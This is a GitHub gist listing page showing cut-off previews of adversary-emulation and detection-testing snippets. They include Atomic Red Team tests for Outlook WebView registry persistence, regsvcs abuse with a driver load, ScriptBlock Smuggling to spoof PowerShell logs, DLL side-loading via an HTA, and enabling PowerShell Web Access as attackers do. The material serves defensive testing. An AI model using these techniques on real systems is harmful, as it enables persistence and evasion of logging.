Skip to content

Instantly share code, notes, and snippets.

View MHaggis's full-sized avatar
:shipit:

Michael Haag MHaggis

:shipit:
469 followers · 92 following
View GitHub Profile
@MHaggis
MHaggis / Bluetrait_rmm.md
Created March 13, 2025 16:32

Basic install of Bluetrait RMM software.

|FilePath |FileName |FileSize|LastModified |MD5 |SHA1 |SHA256 |FileVersion |Signature |Signer |Issuer | |------------------------------------------------------------------------------|---------------------------------------|--------|--------------------|--------------------------------|----------------------------------------|----------------------------------------------------------------|------------|----------|---------------------

@MHaggis
MHaggis / SDDLTest.md
Created January 14, 2025 16:38

SDDL Security Testing and Demonstration Guide

1. Decode an SDDL String (Basic Permissions Breakdown)

Objective: Retrieve and interpret SDDL for a file.

Command:

(Get-Acl C:\Windows\System32\cmd.exe).Sddl

Expected Outcome:

@MHaggis
MHaggis / getfileassoc.ps1
Created November 15, 2024 19:29
$associations = @()
$registryPaths = @(
"HKLM:\Software\Classes",
"HKCU:\Software\Classes"
)
foreach ($path in $registryPaths) {
Get-ChildItem $path | ForEach-Object {
if ($_.PSChildName -like ".*") {
$extension = $_.PSChildName
@MHaggis
MHaggis / PSWA.md
Last active January 22, 2025 18:54

Enable PowerShell Web Access like an APT

Ref: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a

PowerShell:

# PrivCheck
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Warning "Please run this script as an Administrator!"
    Exit
@MHaggis
MHaggis / IvantivTM_Setup.md
Created August 20, 2024 16:11

Ivanti Virtual Traffic Manager (VTM) Docker Setup

This guide outlines the steps to set up the Ivanti Virtual Traffic Manager (VTM) using Docker.

Prerequisites

Before you begin, ensure you have the following:

  • A system with Docker installed.
  • Docker Hub credentials (if required).
@MHaggis
MHaggis / Atomic-Specula-reg.ps1
Created July 29, 2024 20:58
ref - https://github.com/trustedsec/specula
# Atomic Red Team Test: Add URL to Outlook WebView Registry Keys
# Description: This test adds a URL to various Outlook WebView registry keys, which could be used for persistence.
# MITRE ATT&CK Technique: T1112 - Modify Registry
$url = "https://example.com/malicious"
$officeVersions = @("16.0", "15.0", "14.0")
$folders = @("Inbox", "Calendar", "Contacts", "Deleted Items", "Drafts", "Journal", "Junk E-mail", "Notes", "Outbox", "RSS", "Sent Mail", "Tasks", "Today")
foreach ($version in $officeVersions) {
foreach ($folder in $folders) {
@MHaggis
MHaggis / AtomicRedTeam.nsi
Created July 29, 2024 18:39
Compile with https://nsis.sourceforge.io/Main_Page. Be sure to modify the path to where a driver is located for testing purposes ("path\to\your\ListOpenedFileDrv_32.sys"). Compile with .\makensis.exe C:\users\Administrator\Desktop\AtomicRedTeam.nsi or via the NSIS UI.
; NSIS Script for Atomic Red Team Tests (AutoIt, T1218.009, and driver load)
; Source and credit https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/src/T1218.009.cs
!macro T1218_009_CS_CONTENT
FileWrite $0 "using System;$\r$\n\
using System.EnterpriseServices;$\r$\n\
using System.Runtime.InteropServices;$\r$\n\
$\r$\n\
namespace regsvcser$\r$\n\
{$\r$\n\
@MHaggis
MHaggis / ScriptBlockSmuggling.yaml
Created June 18, 2024 20:28
- name: ScriptBlock Smuggling
description: This test demonstrates the use of ScriptBlock Smuggling to spoof PowerShell logs.
supported_platforms:
- windows
input_arguments:
spoofed_command:
description: The benign command to be logged.
type: string
default: Write-Output 'Hello'
executed_command:
@MHaggis
MHaggis / CrushScanner.lua
Last active May 16, 2024 20:09
local function file_exists(path)
local file = io.open(path, "r")
if file then
file:close()
return true
end
return false
end
print([[
@MHaggis
MHaggis / AtomicDLLSide-Loading.hta
Created April 4, 2024 18:08
<html>
<head>
<title>Atomic Red Team - DLL Side-Loading HTA</title>
<HTA:APPLICATION ID="AtomicSideLoad" APPLICATIONNAME="AtomicSideLoad" BORDER="thin" BORDERSTYLE="normal" ICON="shell32.dll,4" >
<script language="VBScript">
Dim shell
Set shell = CreateObject("Wscript.Shell")
' Base64 encoded content of invite.zip - which is https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary">https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary
Dim base64EncodedContent